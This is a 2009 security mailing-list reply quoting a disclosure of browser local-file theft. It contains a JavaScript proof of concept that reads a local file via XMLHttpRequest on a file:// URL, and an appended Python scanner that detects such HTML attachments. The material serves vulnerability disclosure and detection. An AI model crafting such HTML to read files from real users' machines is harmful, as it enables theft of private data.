it's always been possible to steal local files if you can convince a user to open a "harmless" html file from their local filesystem. this is possible because the scripting code runs within local context (in FF terminology - not sure what Safari calls it). last time i checked [1] [2] FF didn't even issue a warning when opening a local file with scripting code in it, although i haven't checked in the case of Safari

[1] http://www.gnucitizen.org/blog/web-pages-from-hell-2/
[2] http://marc.info/?l=bugtraq&m=116386919506057&w=2

On Tue, Jun 9, 2009 at 5:33 PM, <pantera_bleed@xxxxxxxxxxx> wrote:
>
> .html can be crafted to force an unaware user to read a file from local, and then possibly send it to a server.
>
> var method = "GET"
> var URL = "file:///C:/argentina/bsas_junin.txt"
> xmlhttp.open( method, URL, true)
>
> This type of request is possible if the file is on the user's local hard disk (CHROME2); in other browsers I was able to do the same but with LAN access to the file, no need to write to the local hard disk (SAFARI3)
>
>
> var xmlhttp = new XMLHttpRequest()   // request object used below
> if (xmlhttp != null) {
>   xmlhttp.open( method, URL, true)
>   xmlhttp.onreadystatechange=function(){
>     if (xmlhttp.readyState==4) {
>       alert(URL + "\n\n" + xmlhttp.responseText)
>     }
>   }
>   xmlhttp.send(null)   // the request is not issued until send() is called
> }
>
> this is a valid operation; javascript can then read xmlhttp.responseText, yes, the file content.
>
> After this you can do whatever you want with the file.
>
> note that you MUST know the file path!!
>
> crafted by: federico.lanusse
> pantera_bleed@xxxxxxxxxxx
> federico.lanusse@xxxxxxxxxxxx
>
> company: clarolab QA team
> yeah! let's rock Ateam!!
>
> Chrome ISSUE, with attached POC.
> http://code.google.com/p/chromium/issues/detail?id=13671
>
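As an added example (not part of this thread or of any browser project), a small Python check of the kind a mail gateway or attachment scanner could run: it flags HTML files whose inline script opens an XMLHttpRequest against a file:// URL, the pattern discussed above. The sample HTML and the finding names are constructed for this example.

```python
import re
from html.parser import HTMLParser

# Constructed sample: an HTML attachment whose inline script reads a local file
# through XMLHttpRequest, as described in the thread.
SUSPICIOUS_HTML = """<html><body>
<script>
var xmlhttp = new XMLHttpRequest();
xmlhttp.open("GET", "file:///C:/example/notes.txt", true);
xmlhttp.onreadystatechange = function () {
  if (xmlhttp.readyState == 4) { alert(xmlhttp.responseText); }
};
xmlhttp.send(null);
</script>
</body></html>"""

# Constructed sample: ordinary markup with no script and no file:// references.
BENIGN_HTML = "<html><body><p>Quarterly report</p><img src='logo.png'></body></html>"

FILE_URL = re.compile(r'file:///?[^\'"\s)]+', re.IGNORECASE)

class _ScriptExtractor(HTMLParser):
    """Collects inline <script> bodies and file:// URLs in src/href/data attributes."""
    def __init__(self):
        super().__init__()
        self.in_script, self.buf, self.scripts, self.file_refs = False, [], [], []
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script, self.buf = True, []
        for name, value in attrs:
            if name in ("src", "href", "data") and value and value.lower().startswith("file:"):
                self.file_refs.append((tag, value))
    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False
            self.scripts.append("".join(self.buf))
    def handle_data(self, data):
        if self.in_script:
            self.buf.append(data)

def scan_html(html):
    """Return (finding, detail) tuples; an empty list means nothing matched."""
    parser = _ScriptExtractor()
    parser.feed(html)
    findings = [("file_url_in_markup", f"<{t}> references {u}") for t, u in parser.file_refs]
    for body in parser.scripts:
        urls = FILE_URL.findall(body)
        uses_xhr = "XMLHttpRequest" in body or "ActiveXObject" in body  # ActiveXObject: legacy IE XHR
        if urls and uses_xhr and re.search(r"\.open\s*\(", body):
            findings.append(("xhr_to_file_url", ", ".join(urls)))
        elif urls:
            findings.append(("file_url_in_script", ", ".join(urls)))
        if uses_xhr and "responseText" in body:
            findings.append(("reads_xhr_response", "script inspects responseText"))
    return findings

def is_suspicious(html):
    """True when script-driven or markup-driven file:// access is present."""
    return any(k in ("xhr_to_file_url", "file_url_in_markup") for k, _ in scan_html(html))
```

A match is a reason to quarantine or to open the attachment only in a sandboxed viewer; it does not by itself prove the file is malicious, since scripts that merely mention file:// also produce a lower-severity finding.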